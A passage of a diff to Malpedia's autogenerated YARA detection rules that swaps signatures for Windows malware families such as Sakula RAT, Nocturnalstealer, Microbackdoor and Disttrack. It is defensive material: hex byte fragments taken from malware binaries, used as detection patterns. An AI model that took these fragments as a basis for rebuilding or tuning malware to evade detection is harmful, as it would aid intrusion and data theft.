 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "40f61fa4-a638-5725-b8b6-91b34a21950a"
+		id = "c67cc17c-f08c-53a6-ada6-8bb99660ec4c"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.clipog"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.clipog_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.defray"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.defray_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "9ab729847c05f2fd79a1197d1bbe3eecdfb3d818a19100d3fd94f6d00b4e49b5"
+		logic_hash = "e0802b8bc0edda2578b1a81d41f729faf3574dbf8b45d2b645404d3734d8c95f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -95441,34 +95656,34 @@ rule MALPEDIA_Win_Clipog_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488b4b18 6685c0 740c 488d1552e70100 }
-		$sequence_1 = { 488d1552e70100 e9???????? 488d154ae70100 e9???????? b910000000 }
-		$sequence_2 = { 760c 488d0d5fec0100 e8???????? 48397b18 730d 488bd7 }
-		$sequence_3 = { 753b 488b41f8 483bc1 7338 482bc8 4883f908 7235 }
-		$sequence_4 = { 4883f808 725d 48ffc0 488b4c2448 493bc4 7606 e8???????? }
-		$sequence_5 = { 488bda 4c8d0d1fbc0000 8bf9 488d1586a10000 b906000000 4c8d0502bc0000 e8???????? }
-		$sequence_6 = { 488b05???????? 4833c4 488985a0040000 4c8b95f8040000 488d0524160100 0f1000 }
-		$sequence_7 = { 488d158ee80100 e9???????? b910000000 ff15???????? 488b4b18 }
-		$sequence_8 = { e8???????? 90 4c8d0556ea0100 488bd0 }
-		$sequence_9 = { 488d1599100200 488d0d9a100200 e8???????? 488bd8 488d4c2430 48837c244810 480f434c2430 }
+		$sequence_0 = { b86effffff 5e 8be5 5d c3 8d4102 8906 }
+		$sequence_1 = { 8be5 5d c3 8b4d08 8d041e 5f 5e }
+		$sequence_2 = { 0f84cf020000 83f8ff 0f84c6020000 6880000000 ffd6 50 }
+		$sequence_3 = { 83c40c 83601000 8b4df0 68???????? 8d4918 e8???????? 8d45ec }
+		$sequence_4 = { e8???????? f6450801 59 740d 68b8000000 56 }
+		$sequence_5 = { 66a5 8dbdbefcffff be???????? ab ab ab ab }
+		$sequence_6 = { 33c0 663b88f0724700 740d 83c002 83f814 72ef 33c0 }
+		$sequence_7 = { 33ff 393d???????? 7e79 33db 6800001000 e8???????? 8bf0 }
+		$sequence_8 = { a5 a5 66a5 8dbdbef6ffff be???????? ab ab }
+		$sequence_9 = { 0fb7c7 894de8 884dd8 8d4dd8 6a08 8945d4 c745ec0f000000 }
 
 	condition:
-		7 of them and filesize < 372736
+		7 of them and filesize < 1253376
 }
-rule MALPEDIA_Win_Sakula_Rat_Auto : FILE
+rule MALPEDIA_Win_T34Loader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5af52a87-4449-5086-85f2-378359f4ae21"
+		id = "e5720d10-2fbe-56e7-a983-268d042c48b1"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sakula_rat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sakula_rat_auto.yar#L1-L238"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.t34loader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.t34loader_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "58d4e203f11e4dd863a93827734d462109e66a0a903d18e391705e909badfaf0"
+		logic_hash = "ec0cde05ce06de31a82d86f3a54c045f2d69d36946c25715e1f108cf44d303ce"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -95480,45 +95695,32 @@ rule MALPEDIA_Win_Sakula_Rat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a00 6800010000 6a00 6a00 68???????? }
-		$sequence_1 = { b802000000 eb0a f7d8 1bc0 83e0fd }
-		$sequence_2 = { 83e103 8d8396000000 f3a4 8bc8 8a10 40 84d2 }
-		$sequence_3 = { 33f6 8d4900 ff15???????? 33d2 b914000000 }
-		$sequence_4 = { 889c244b010000 48 8d642400 8a4801 40 3acb }
-		$sequence_5 = { eb05 41 3bce 72dd 8d46ff }
-		$sequence_6 = { 50 6800040000 57 6a02 51 ff15???????? }
-		$sequence_7 = { 6a00 6a00 6a00 53 6aff 56 6a00 }
-		$sequence_8 = { 48895c2420 ff15???????? 33d2 488bcb ff15???????? }
-		$sequence_9 = { 8b45f8 8b5df4 39d8 721e 741c 29d8 0345fc }
-		$sequence_10 = { 4c8d4dd7 4c8d05791d0000 488d0d8a1d0000 33d2 ff15???????? }
-		$sequence_11 = { e8???????? 8b45f0 eb02 31c0 50 ff75fc e8???????? }
-		$sequence_12 = { 3bc6 745f 4c8d4dcf 4c8d055b1d0000 488d0d7c1f0000 }
-		$sequence_13 = { 8b4d08 034df8 0fbe11 83fa41 7c16 8b4508 0345f8 }
-		$sequence_14 = { 488bd8 4885c0 0f84d3000000 8d7e2f 33d2 488bc8 448bc7 }
-		$sequence_15 = { e8???????? 83f800 7405 8b45ec }
-		$sequence_16 = { ff15???????? 488bce 488bd8 ff15???????? 488364243800 488364243000 4c8bc6 }
-		$sequence_17 = { ba14008410 488b01 ff5028 3bc6 747d }
-		$sequence_18 = { 488b55d7 488b01 488364242000 4c8d0d240f0000 ff9080000000 3bc6 }
-		$sequence_19 = { 8945f0 83f800 0f84e7000000 6804010000 ff75f0 }
-		$sequence_20 = { 83f800 742e 8b5d08 8b4df4 8b4114 8903 8b4110 }
-		$sequence_21 = { 488bce ff15???????? 488364243800 488364243000 8364242800 488364242000 448bc8 }
-		$sequence_22 = { 689c000000 e8???????? 8945fc 83f800 0f84ab000000 }
+		$sequence_0 = { 7424 88542438 eb1e 4885c0 7505 4585ff 7414 }
+		$sequence_1 = { e8???????? 488d542420 488bcb e8???????? 488bcb e8???????? 84c0 }
+		$sequence_2 = { 743f 803d????????00 7436 48ffc0 4d8d1443 488b4587 48ffc0 }
+		$sequence_3 = { e8???????? 488b5710 488bc8 4889542420 4c8bcb }
+		$sequence_4 = { 418ac0 884708 488b542440 488bcf e8???????? 84c0 0f84e6feffff }
+		$sequence_5 = { 4c8bc7 488d4c2430 488bd6 e8???????? 488d4c2430 e8???????? }
+		$sequence_6 = { 0f845e010000 488b0f 33db 4885c9 7441 488b4138 483918 }
+		$sequence_7 = { e8???????? 488bd0 488d4d20 e8???????? 488bd3 488d4d30 e8???????? }
+		$sequence_8 = { 488d4138 41b806000000 488d15b1370200 483950f0 740c 488b10 4885d2 }
+		$sequence_9 = { 5f 5e 5d c3 4c8d05d3b50200 498b14e8 8a44fa38 }
 
 	condition:
-		7 of them and filesize < 229376
+		7 of them and filesize < 1212416
 }
-rule MALPEDIA_Win_Sendsafe_Auto : FILE
+rule MALPEDIA_Win_Microbackdoor_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "14b9e6b6-2043-58da-b1e8-265e07b21f6c"
+		id = "d034a3c6-ae16-5b99-83b8-8b1af34e1631"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sendsafe"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sendsafe_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.microbackdoor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.microbackdoor_auto.yar#L1-L174"
 		license_url = "N/A"
-		logic_hash = "1cc8bf83d06a8d8be9a015120fbe9f24392bb542d1a6aed7e6e2573904d5eeb5"
+		logic_hash = "aab22f804c7581af6f351afbab65356d1b51594dabf7c74f24bb9a35b014fbaa"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -95532,34 +95734,79 @@ rule MALPEDIA_Win_Sendsafe_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b5508 52 8d45bc 50 e8???????? 83c40c 8d4dbc }
-		$sequence_1 = { eb07 c745dc00000000 0fb645dc 85c0 0f842f010000 8b4dfc 83c110 }
-		$sequence_2 = { ffd2 83c408 e9???????? 8b4508 8b08 c741146d000000 8b5508 }
-		$sequence_3 = { b904000000 6bd10e 8b4dfc 33441110 3345f4 8945f4 8b55f4 }
-		$sequence_4 = { 8b952cfdffff 837a1410 721c 8b8564fcffff 898524fdffff 8b8d2cfdffff 8b11 }
-		$sequence_5 = { e8???????? 83c414 85c0 0f84e1010000 ff7518 8d4704 57 }
-		$sequence_6 = { e8???????? 83c408 8b4dfc 89411c 8b5508 8b8214010000 c1e003 }
-		$sequence_7 = { e9???????? e8???????? 8bd0 89542434 85d2 7511 684f060000 }
-		$sequence_8 = { eb1e 8b55f4 833a00 7406 c645fe01 eb04 c645fe00 }
-		$sequence_9 = { ff15???????? 8d5508 52 8b4dfc 83c104 e8???????? 8945f8 }
+		$sequence_0 = { 33c9 8d45f0 50 51 6a3a }
+		$sequence_1 = { ffd7 eb06 ff15???????? 8bc6 eb06 }
+		$sequence_2 = { eb42 0fb6442431 3c5a 7520 837c243400 7419 66837c243200 }
+		$sequence_3 = { 488dac2410feffff 4881ecf0020000 8bd9 33c9 440fb7ea e8???????? }
+		$sequence_4 = { 418bce 0fb7de ff15???????? 488d15ea390000 488d4c2450 4c8bc0 }
+		$sequence_5 = { 66896c2420 ff15???????? 8bce 89742424 }
+		$sequence_6 = { 59 56 ff15???????? eb06 ff15???????? 8b75f4 }
+		$sequence_7 = { ff15???????? 488d0d01290000 eb68 488d542430 41b800010000 488bcb e8???????? }
+		$sequence_8 = { 7412 488d0dfa700000 448bc0 488bd6 e8???????? 03df }
+		$sequence_9 = { ff15???????? 85c0 0f8599feffff 8d4508 33db 50 }
+		$sequence_10 = { eb57 4d03c9 498bd7 498bce 43ff54cd08 }
+		$sequence_11 = { 448bc6 488bd0 488bcf e8???????? 8bf8 85c0 }
+		$sequence_12 = { 3bfe 7cdd 33c0 40 }
+		$sequence_13 = { 895d08 e8???????? 83c410 85c0 7467 }
+		$sequence_14 = { ff15???????? ff75fc ff15???????? ff7508 ff15???????? eb0e ff15???????? }
+		$sequence_15 = { 8975fc 50 56 56 6a19 ff75f8 ff15???????? }
+
+	condition:
+		7 of them and filesize < 123904
+}
+rule MALPEDIA_Win_Nocturnalstealer_Auto : FILE
+{
+	meta:
+		description = "autogenerated rule brought to you by yara-signator"
+		author = "Felix Bilstein - yara-signator at cocacoding dot com"
+		id = "5964c83b-5a1b-5913-a49a-303693a90164"
+		date = "2026-01-05"
+		modified = "2026-01-06"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nocturnalstealer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nocturnalstealer_auto.yar#L1-L134"
+		license_url = "N/A"
+		logic_hash = "c662283be69db4ef7dfe1019eca1797cdbfc6ecd9828799d75f57c47594f7be3"
+		score = 75
+		quality = 75
+		tags = "FILE"
+		version = "1"
+		tool = "yara-signator v0.6.0"
+		signator_config = "callsandjumps;datarefs;binvalue"
+		malpedia_rule_date = "20260105"
+		malpedia_hash = "19b79e7cab4eaf532122e5b45a77dd8f6bb5cc79"
+		malpedia_version = "20251219"
+		malpedia_license = "CC BY-SA 4.0"
+		malpedia_sharing = "TLP:WHITE"
+
+	strings:
+		$sequence_0 = { e9???????? bd01000000 81c717a0fb5f 01ef 81ef17a0fb5f 5d 81e7cfaad32f }
+		$sequence_1 = { d280e1f107c3 7dbf 41 6c 46 3f a984011afd }
+		$sequence_2 = { e9???????? 51 b9dd9abe6f 31c8 59 05f1eb6f2f 05b354dc74 }
+		$sequence_3 = { e9???????? bb74bcf36f f7d3 4b 81cb108dfb7b 81e337e4f765 55 }
+		$sequence_4 = { c70424009d1a20 891424 ba77a7ee3f 89d3 8b1424 53 89e3 }
+		$sequence_5 = { e9???????? 58 81c404000000 e9???????? 81f6d544f73f 58 81eb4703df3d }
+		$sequence_6 = { ff3424 8b0c24 57 e9???????? 58 051ff53d3f 01c6 }
+		$sequence_7 = { f7d0 2d612e2f1b 053325461d 89c2 58 01542404 5a }
+		$sequence_8 = { e9???????? 8365d800 c745dcfedf4900 a1???????? 8d4dd8 33c1 8945e0 }
+		$sequence_9 = { e9???????? 81f2209cfd37 81eaf4ffef7d 81c2d90dace9 e9???????? 890c24 812c2439bc9f73 }
 
 	condition:
-		7 of them and filesize < 3743744
+		7 of them and filesize < 10739712
 }
-rule MALPEDIA_Win_Hoplight_Auto : FILE
+rule MALPEDIA_Win_Disttrack_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c82c3889-c1c1-5b5f-b045-d951cf697dce"
+		id = "656ce2d7-e23b-52b7-a17b-bd1f83c468f3"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hoplight"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.hoplight_auto.yar#L1-L114"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.disttrack"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.disttrack_auto.yar#L1-L269"
 		license_url = "N/A"
-		logic_hash = "64af8d5fa666e50115627ed90a11584ace05accbe5176be041c804017c028f5b"
+		logic_hash = "1a87cbbf3cac3bb5395930782b27d52657176f4eea6766d20ecb09a08d9650c6"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -95571,30 +95818,49 @@ rule MALPEDIA_Win_Hoplight_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488b442450 c70000000000 c705????????00000100 b800000100 eb53 488b442440 4889442428 }
-		$sequence_1 = { 0fb6542434 488b4c2450 e8???????? 488b442450 8b80ccaf0600 488b4c2450 488d8401b8af0100 }
-		$sequence_2 = { 488bcb 488905???????? ff15???????? 488d158c620400 488bcb 488905???????? ff15???????? }
-		$sequence_3 = { 488b442428 488b8018020000 4889442428 41b820020000 33d2 488b4c2430 e8???????? }
-		$sequence_4 = { 4883c004 4889842418020000 8b442414 0faf442424 8944240c 8b442414 0faf442408 }
-		$sequence_5 = { 488b4878 e8???????? b801000000 eb76 41b800420000 33d2 488b442440 }
-		$sequence_6 = { 4489442418 4889542410 48894c2408 4883ec48 488b4c2450 e8???????? 89442420 }
-		$sequence_7 = { 482bc8 488bc1 4883f801 7d0a b814ffffff e9???????? 488b8424d0000000 }
+		$sequence_0 = { 52 6a00 6a00 6848000700 }
+		$sequence_1 = { e8???????? 83c404 50 e8???????? 83c404 68???????? ff15???????? }
+		$sequence_2 = { 53 ff15???????? 5d 5b 8bc7 5f 5e }
+		$sequence_3 = { ff15???????? 8d45dc 50 ff15???????? 8b4ddc }
+		$sequence_4 = { 57 e8???????? 6a07 e8???????? 59 c3 6a10 }
+		$sequence_5 = { 8b4204 8d8c24a4000000 894c2420 c7440434fcc24100 8d4c244c }
+		$sequence_6 = { ff15???????? 85c0 7406 8b4df0 51 ffd0 83ffff }
+		$sequence_7 = { 0f85a5000000 33d2 488d4c2470 448d4268 }
+		$sequence_8 = { 83c1ff 898d14f8ffff 8b9514f8ffff 8a4201 888513f8ffff }
+		$sequence_9 = { 48397d10 7430 488b4c2430 e8???????? 4c8bc0 488b542430 }
+		$sequence_10 = { 740c 837d1800 7406 837d1c00 751f }
+		$sequence_11 = { 8d8424fc000000 50 8d4c2450 e8???????? }
+		$sequence_12 = { 0f87260a0000 ff248597fa4000 33c0 838df4fbffffff }
+		$sequence_13 = { 32040e 6a00 8d55f0 52 }
+		$sequence_14 = { 85c0 750e 80fb2b 7409 80fb2f 0f858c000000 }
+		$sequence_15 = { 488d9c1de0010000 448be6 48895c2428 4963cc }
+		$sequence_16 = { e8???????? 85c0 75de 488bcb ff15???????? 33c0 488b8c2460020000 }
+		$sequence_17 = { 83c804 48397948 0f44d0 eb0e 488b4148 48f7d8 1bd2 }
+		$sequence_18 = { e8???????? 68???????? 8d4df4 51 c745f408f34100 e8???????? }
+		$sequence_19 = { 85c0 751a 488d156cb10000 41b810200100 488bcd e8???????? }
+		$sequence_20 = { c1fe05 c1e106 030cb540174200 eb02 8bca f641247f 759b }
+		$sequence_21 = { 33f6 56 51 50 52 e8???????? 8945b8 }
+		$sequence_22 = { c745fc00000000 e8???????? c745fcffffffff 8b5790 8b4204 c7443890b4c24100 }
+		$sequence_23 = { 8d5c0002 e8???????? 488d542430 448bd8 }
+		$sequence_24 = { 8b0c8d40174200 83e61f c1e606 89040e 8b45f8 e9???????? }
+		$sequence_25 = { e8???????? 408ac7 488b8d80020000 4833cc e8???????? 4c8d9c2490030000 498b5b10 }
+		$sequence_26 = { 8b149540174200 59 c1e006 59 8a4dff 80c901 884c0204 }
 
 	condition:
-		7 of them and filesize < 765952
+		7 of them and filesize < 1112064
 }
-rule MALPEDIA_Win_Prilex_Auto : FILE
+rule MALPEDIA_Win_Poohmilk_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ddf38178-7ef1-5c36-b125-6bf3f451e7fb"
+		id = "cacedc8f-4cf2-5e4c-8224-5986e70d4e19"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.prilex"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.prilex_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.poohmilk"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.poohmilk_auto.yar#L1-L117"
 		license_url = "N/A"
-		logic_hash = "fbaec0a907818a5c45443c868d80b924ff651b8b9668a983a8d7f07c1fa9a7e6"
+		logic_hash = "15b630d72bc25e1b2f8f69f3f9fe553b37147103f16fa6bc4f49ddd60f0d2e34"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -95608,32 +95874,32 @@ rule MALPEDIA_Win_Prilex_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d4ddc ff15???????? 8d4dcc ff15???????? 8d55c4 52 6a00 }
-		$sequence_1 = { 8d4db0 50 51 8975b0 e8???????? 8b55e8 }
-		$sequence_2 = { c785d4feffff01000000 8b45c4 50 6a01 ff15???????? }
-		$sequence_3 = { 8b550c 3b32 0f84d4000000 3bf7 0f84cc000000 8d55b8 }
-		$sequence_4 = { ff15???????? 50 8b45e0 8d4ddc 50 }
-		$sequence_5 = { 8bf0 ff15???????? 8d45c8 8d4dcc 50 51 }
-		$sequence_6 = { 33c0 833a00 0f95c0 0bc8 85c9 7538 c745fc03000000 }
-		$sequence_7 = { 51 e8???????? 8945d0 c745fc04000000 66c785f8feffff0000 8d95f8feffff }
-		$sequence_8 = { 8d8dacfdffff 68???????? 52 898d54fdffff c7854cfdffff08400000 }
-		$sequence_9 = { 8b542428 33c0 89442414 53 8944241c 33c9 }
+		$sequence_0 = { c3 68???????? 8d95ecfdffff 52 }
+		$sequence_1 = { 0f84de000000 3bf3 0f84d6000000 8b4110 0fb75704 }
+		$sequence_2 = { 752c ff15???????? 6a05 6a00 6a00 }
+		$sequence_3 = { 0f84d3000000 33d2 668910 8d85d4f9ffff }
+		$sequence_4 = { 8b01 33ff 8995f4efffff 397e10 0f86cf000000 }
+		$sequence_5 = { 83ffff 0f8456ffffff 8b95d4fbffff 6a00 8d8dd0fbffff 51 }
+		$sequence_6 = { 8bd1 03d7 c785ecefffff00000000 1385ecefffff 89bde8efffff }
+		$sequence_7 = { 8b8570d2ffff 8b5038 837a3400 7513 8b8d84d2ffff 8b5028 }
+		$sequence_8 = { 40 80b9b075410000 74e8 8a13 0fb6ca 0fbe89b0754100 }
+		$sequence_9 = { 33c0 894610 894614 894618 89461c 8b4620 8b4f28 }
 
 	condition:
-		7 of them and filesize < 450560
+		7 of them and filesize < 245760
 }
-rule MALPEDIA_Win_Babyshark_Auto : FILE
+rule MALPEDIA_Win_Babylon_Rat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "bba62dea-b8fb-5177-af59-ee7484609223"
+		id = "bc5c3c5f-b09f-560b-a5c8-4129e77b8b02"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.babyshark"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.babyshark_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.babylon_rat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.babylon_rat_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "170a55c792dd841a430b5276e4b7ea8cd0c0e2d28c406b503a22728951bd6c1d"
+		logic_hash = "2a5b12d9c48bc80c359b824ca684a979c3525be47a37762af45326a7566f7848"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -95647,32 +95913,32 @@ rule MALPEDIA_Win_Babyshark_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83c40c 8d4c2404 6a00 51 ffd6 6a00 }
-		$sequence_1 = { 8bc8 83e01f c1f905 8b0c8d607e4000 8a44c104 83e040 }
-		$sequence_2 = { 8b0c8d607e4000 8a44c104 83e040 c3 a1???????? }
-		$sequence_3 = { bf???????? f3ab 8d3452 895dfc c1e604 aa 8d9ec8674000 }
-		$sequence_4 = { 80e920 ebe0 80a0206c400000 40 3bc6 72be 5e }
-		$sequence_5 = { 8db6bc674000 bf???????? a5 a5 59 a3???????? }
-		$sequence_6 = { 8a8094504000 83e00f eb02 33c0 0fbe84c6b4504000 }
-		$sequence_7 = { c1f804 83f807 8945d0 0f879a060000 ff2485271a4000 834df0ff }
-		$sequence_8 = { 5e 8d0c8dc8614000 3bc1 7304 3910 7402 }
-		$sequence_9 = { ff15???????? 8bf0 68???????? 8d442408 68???????? 50 }
+		$sequence_0 = { 8b4610 83c40c 8b4dfc 8b4c080c 8b45f4 3b01 7413 }
+		$sequence_1 = { ff75ec e8???????? 59 59 85ff 0f8541010000 8b0b }
+		$sequence_2 = { ff75c0 6a23 56 e8???????? 6a01 56 e8???????? }
+		$sequence_3 = { 8b450c f6402a20 753d 51 ff75f4 6a70 53 }
+		$sequence_4 = { ff3402 e8???????? 8bf0 83c404 803e9a 0f85a6000000 8b55bc }
+		$sequence_5 = { eb5e 83f8fa 7508 897e10 884601 eb51 83f8f6 }
+		$sequence_6 = { 8d4801 66894dbc 8b4620 8945a4 8b450c 8945b0 8b06 }
+		$sequence_7 = { 85f6 7e4c c7451007000000 53 8b450c 0fbe5c1001 0fbe0c10 }
+		$sequence_8 = { ff75f4 ffb57cffffff 53 56 e8???????? 83c42c 837dc000 }
+		$sequence_9 = { ffb3ac000000 e8???????? 8bbbac000000 be???????? 8b4dfc 03f9 51 }
 
 	condition:
-		7 of them and filesize < 65272
+		7 of them and filesize < 1604608
 }
-rule MALPEDIA_Win_Nim_Blackout_Auto : FILE
+rule MALPEDIA_Win_Fct_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "52c7d5e9-12a7-539a-90b8-852642880eb0"
+		id = "d02b72bc-5bf1-5377-8d43-512cbfd79322"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nim_blackout"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nim_blackout_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fct"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.fct_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "6c5cae00e9c851f788aea7ba4107707f8738f1e8e9b098f9929e9947fb70cddd"
+		logic_hash = "cc0dc64d7cd3b6633f3a5f0a0519f80550bbd17b8f06fffbd5263c4f40c48188"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -95686,32 +95952,32 @@ rule MALPEDIA_Win_Nim_Blackout_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 55 4889e5 4883ec30 48894d10 488b05???????? 4885c0 750d }
-		$sequence_1 = { 488b00 eb05 b800000000 483b85a8000000 7f30 4883bdf800000000 }
-		$sequence_2 = { 48c745c0c0000000 488d05ad7e0100 488945c8 488b45f0 488945f8 eb40 90 }
-		$sequence_3 = { 48c1e003 4801d0 488b00 4885c0 741a 488b4510 488b5008 }
-		$sequence_4 = { 488905???????? 488b05???????? 4885c0 750c 488d0d229c0100 e8???????? 488b05???????? }
-		$sequence_5 = { 488b45f8 488905???????? eb01 90 e8???????? 90 4883c460 }
-		$sequence_6 = { 488d05dd770100 488945e8 488b4510 488b00 ba08000000 4889c1 e8???????? }
-		$sequence_7 = { 488945f8 48c745d07b000000 488d05d02a0200 488945d8 488b45f8 488d14c500000000 488b4518 }
-		$sequence_8 = { 488d05ed680100 48894558 ba00000000 488b85b8000000 4883c001 7105 ba01000000 }
-		$sequence_9 = { 488d05d2af0200 488945e8 488b5510 488b05???????? 488d4818 e8???????? e8???????? }
+		$sequence_0 = { 803d????????00 753c c705????????60504100 c705????????88534100 c705????????80524100 e8???????? }
+		$sequence_1 = { 8365c000 c745c42b2e4000 a1???????? 8d4dc0 33c1 8945c8 8b4518 }
+		$sequence_2 = { ffb52cfdffff 6a01 e8???????? 8d8d80fdffff }
+		$sequence_3 = { 0f434dd8 3bc2 772c 8d3400 898544fdffff 83fa08 8dbd34fdffff }
+		$sequence_4 = { 83c8ff eb07 8b04f574204100 5f 5e 5b }
+		$sequence_5 = { 03348d50614100 837e18ff 740c 837e18fe 7406 }
+		$sequence_6 = { 83c102 6685c0 75f5 8b5dec }
+		$sequence_7 = { 8bc3 d1f9 2bc2 3bc8 772f 83fb08 }
+		$sequence_8 = { eb1e 6a02 68???????? c6854cfdffff00 8d4dbc }
+		$sequence_9 = { 33c0 6689047e eb21 6a04 }
 
 	condition:
-		7 of them and filesize < 1068032
+		7 of them and filesize < 204800
 }
-rule MALPEDIA_Win_Backspace_Auto : FILE
+rule MALPEDIA_Win_Acidbox_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "fb0b0e7f-6932-5f0b-957b-77772fb8dfd5"
+		id = "e7057136-2c24-5d9e-851b-e4da203a95ed"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.backspace"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.backspace_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.acidbox"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.acidbox_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "8089ff963941257a60e744d7204434da2ea9ab918c2bf4c32b875cf83b55a865"
+		logic_hash = "b9bd6906be69a76719ed536d0340b9bf2024c75961d5ef4e84e1394f2a4d90af"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -95725,32 +95991,32 @@ rule MALPEDIA_Win_Backspace_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d8578fdffff 56 50 89b579fdffff e8???????? }
-		$sequence_1 = { 90 745f 90 13c9 90 eb20 }
-		$sequence_2 = { 68???????? 50 ff15???????? 6a0a 58 }
-		$sequence_3 = { 6a00 68???????? 68???????? 6a50 56 e8???????? 83c420 }
-		$sequence_4 = { 7e1a 8b4c240c 8b442404 56 2bc1 8bf2 }
-		$sequence_5 = { f7f9 55 8b35???????? 8bd8 a1???????? 2b05???????? 0fafc3 }
-		$sequence_6 = { 66ab aa 8d8580fdffff 6800020000 50 53 }
-		$sequence_7 = { a1???????? 57 40 50 ff15???????? 85c0 0f8fa3000000 }
-		$sequence_8 = { c3 55 8bec b808200000 e8???????? 53 56 }
